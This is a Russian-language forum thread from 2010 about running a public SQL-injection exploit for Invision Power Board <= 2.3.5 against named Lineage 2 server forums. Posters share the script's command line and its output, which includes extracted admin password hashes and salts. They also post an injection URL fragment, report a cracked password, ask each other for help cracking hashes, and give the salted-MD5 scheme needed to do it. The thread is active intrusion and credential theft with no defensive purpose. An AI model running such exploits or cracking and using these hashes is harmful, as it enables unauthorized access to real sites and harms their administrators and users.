Рабочая уязвимость на l2europe.net (сервер из топ15)

~~Underwhy~~ · 04.04.2010, 14:58

Проблема возникла потому-что после /forum/ стоит -

la2revo.ru

Invision Power Board <= 2.3.5 Multiple Vulnerabilities
------------------------------------------------------
Update by Elekt version 1.5 ::[TURBO]::

Attack(s):

+ [18.04.2010 14:56:40]
+ [Ссылки могут видеть только зарегистрированные пользователи. ]
/ IDS bypass: 1
/ Cheking sql-injection..
- Forum unvulnerable
/ Try [Ссылки могут видеть только зарегистрированные пользователи. ]
+ [18.04.2010 14:56:40]
+ Total: 1

slepp · 06.04.2010, 13:56

Цитата:


	C:\Documents and Settings\Администратор\1\Php>php.exe 2.3.5-ipb-multi.php -attac k 3 -url [Ссылки могут видеть только зарегистрированные пользователи. ] -uid 1 Invision Power Board <= 2.3.5 Multiple Vulnerabilities ------------------------------------------------------ Update by Elekt version 1.5 ::[TURBO]:: Attack(s): + [06.04.2010 13:28:20] + [Ссылки могут видеть только зарегистрированные пользователи. ] / IDS bypass: 1 / Cheking sql-injection.. + Forum vulnerable! / Using default table prefix: ibf_ + Prefix ibf_ is correct + Using targeted user id 1 / Trying to get the password hash + pass_hash=4115d1f83c891cdd27afe04bd4ca8eb6 + Ok, using hash 4115d1f83c891cdd27afe04bd4ca8eb6 / Trying to get the password salt + pass_salt=MhXDN + Ok, using salt MhXDN + Enjoy! + [06.04.2010 13:28:55] + Total: 181

пользуйтесь дальше хеша я не продвинулся)

**Chipito** · 06.04.2010, 17:55

А нельзя ли без расшифроки хеша зайти на форум через хеш?

Helko · 06.04.2010, 20:12

Цитата:

Сообщение от chipito


	А нельзя ли без расшифроки хеша зайти на форум через хеш?

к сожалению нет

langes · 06.04.2010, 23:02

Цитата:

Сообщение от Underwhy


	Проблема возникла потому-что после /forum/ стоит - la2revo.ru Invision Power Board <= 2.3.5 Multiple Vulnerabilities ------------------------------------------------------ Update by Elekt version 1.5 ::[TURBO]:: Attack(s): + [18.04.2010 14:56:40] + [Ссылки могут видеть только зарегистрированные пользователи. ] / IDS bypass: 1 / Cheking sql-injection.. - Forum unvulnerable / Try [Ссылки могут видеть только зарегистрированные пользователи. ] + [18.04.2010 14:56:40] + Total: 1

Код:

 Attack(s):

 + [06.04.2010 22:57:13]
 + http://***
 / IDS bypass: 1
 / Cheking sql-injection..
 - Script not found
 / Try http://***/***?s=&act=xmlout&do=check-display-name&name
=%2527
 + [06.04.2010 22:57:14]
 + Total: 1

из-за чего может возникать данная ошибка?

**cavern** · 06.04.2010, 23:28

Код:

 + http://l2leona.ru/forum/
 / IDS bypass: 1
 / Cheking sql-injection..
 + Forum vulnerable!
 / Using default table prefix: ibf_
 + Prefix ibf_ is correct
 + Using targeted user id 2
 / Trying to get the password hash
 + pass_hash=f90845fb9872edcf0ece92f0fb862cfb
 + Ok, using hash f90845fb9872edcf0ece92f0fb862cfb
 / Trying to get the password salt
 + pass_salt=2e:|j
 + Ok, using salt 2e:|j
 + Enjoy!

 + [06.04.2010 23:18:29]
 + Total: 188

расшифровал пароль: skyline
а как логин узнать?

Ilnas · 06.04.2010, 23:37

Думаю это очевидно, смотри кто на форуме админ

sekaskissa · 07.04.2010, 01:05

если ктото может помогите расшифровать 4115d1f83c891cdd27afe04bd4ca8eb6 вот эту бяку(

shamrik · 07.04.2010, 02:47

Цитата:

Сообщение от Bomjke


	Без соли ?

hash 4115d1f83c891cdd27afe04bd4ca8eb6
salt MhXDN
я брутил полным перебором, 8 символов, большие + малые буквы + цыфры, безрезультатно

**TakeThat** · 07.04.2010, 03:24

Помогите расшифровать..
pass_hash=15cc4c50a75cb2d3cbf6223a817132c0

langes · 07.04.2010, 12:02

[Ссылки могут видеть только зарегистрированные пользователи. ]
что делать?)

**Chipito** · 07.04.2010, 12:45

С логином напряги,в IPB есть имя для отображения и сам логин,тоисть пасс есть а вот логина нету=)

SandeL · 07.04.2010, 23:07

Народ сори за тупой вопрос

/ IDS bypass: 1
/ Cheking sql-injection..
+ Forum vulnerable!
/ Using default table prefix: ibf_
+ Prefix ibf_ is correct
+ Using targeted user id 1
/ Trying to get the password hash
/
+ Ok, using hash 140db6898b1ce6afc16e5a581d6a1379 <<<<Это хеш??
/ Trying to get the password salt
/
+ Ok, using salt TxqKE <<<<А это чо такое понять немогу
+ Enjoy!

+ [07.04.2010 22:55:49]
+ Total: 182

**Chipito** · 08.04.2010, 00:30

В ипб 2.0+ начали ложить сальт,если расшифровуеш в пассворд про нада ставить хеш тайп md5(md5($salt),md5($pass)) [PHP]

fuzzion · 08.04.2010, 12:04

_http://www.denwer.ru/packages/base_php52.html

этот подойдет

Рабочая уязвимость на l2europe.net (сервер из топ15)

Баги и читы Lineage 2